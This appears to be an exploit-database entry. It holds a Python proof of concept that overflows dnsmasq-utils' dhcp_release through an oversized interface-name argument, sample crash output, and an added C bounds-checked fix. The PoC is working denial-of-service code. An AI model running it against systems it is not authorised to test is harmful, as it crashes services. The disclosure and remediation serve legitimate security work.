Author: JosueEncinar
Platform: linux
Release date: 2020-04-07
```python
# Exploit Title: dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)
# Date: 2020-04-06
# Exploit Author: Josue Encinar
# Software Link: https://launchpad.net/ubuntu/+source/dnsmasq/2.79-1
# Version: 2.79
# Tested on: Ubuntu 18.04

from subprocess import Popen, PIPE

data = ""
bof = False
for i in range (1, 200):
    A = "A"*i
    data = f"dhcp_release {A} 1 1"
    try:
        result = Popen(data, stdout=PIPE, stderr=PIPE, shell=True)
        error = result.stderr.read().decode()
        if "Aborted (core dumped)" in error:
            print("[+] Buffer Overflow detected!")
            print(f"[*] Offset: {i}")
            bof = True
            break
    except Exception as e:
        print(f"[-] {e}")

if not bof:
    print("[-] No buffer overflow...")

## Check line 273 in dhcp_release.c
### strcpy(ifr.ifr_name, argv[1]);
#
## PoC:
# [email protected]:~/Escritorio/bof_dhcp$ python3 dhcp_release_bof.py
# *** buffer overflow detected ***: dhcp_release terminated
# [+] Buffer Overflow detected!
# [*] Offset: 16
```
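The PoC's closing comment points at `strcpy(ifr.ifr_name, argv[1]);`. `ifr_name` is an `IFNAMSIZ`-byte array (16 on Linux), which matches the reported offset. The following is an added example, not code from dnsmasq or from the PoC author, showing a length-checked replacement for that copy; the helper name `set_ifname` and its error codes are assumptions made for illustration.

```c
#ifndef _DEFAULT_SOURCE
#define _DEFAULT_SOURCE 1   /* expose struct ifreq under strict -std= modes */
#endif
#include <errno.h>
#include <net/if.h>         /* struct ifreq, IFNAMSIZ */
#include <stdio.h>
#include <string.h>

/*
 * set_ifname (hypothetical helper): copy a caller-supplied interface name
 * into ifr->ifr_name only if it fits, terminating NUL included.
 * Returns 0, -EINVAL (NULL/empty) or -ENAMETOOLONG; *ifr is untouched on error.
 */
int set_ifname(struct ifreq *ifr, const char *name)
{
    size_t len;

    if (ifr == NULL || name == NULL)
        return -EINVAL;

    /* Bounded length scan: never reads past the first IFNAMSIZ bytes. */
    for (len = 0; len < IFNAMSIZ && name[len] != '\0'; len++)
        ;
    if (len == 0)
        return -EINVAL;
    if (len >= IFNAMSIZ)
        return -ENAMETOOLONG;

    memset(ifr, 0, sizeof(*ifr));       /* zero-fill also provides the NUL */
    memcpy(ifr->ifr_name, name, len);
    return 0;
}

int main(int argc, char **argv)
{
    struct ifreq ifr;
    int rc;
    if (argc < 2) {
        fprintf(stderr, "usage: %s <interface>\n", argv[0]);
        return 2;
    }
    rc = set_ifname(&ifr, argv[1]);
    if (rc != 0) {
        fprintf(stderr, "invalid interface name: %s\n", strerror(-rc));
        return 1;
    }
    printf("interface name accepted: %s\n", ifr.ifr_name);
    return 0;
}
```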
Release Date | Title | Type | Platform | Author |
---|---|---|---|---|
2020-04-07 | "dnsmasq-utils 2.79-1 - 'dhcp_release' Denial of Service (PoC)" | dos | linux | JosueEncinar |
2019-10-01 | "kic 2.4a - Denial of Service" | dos | linux | JosueEncinar |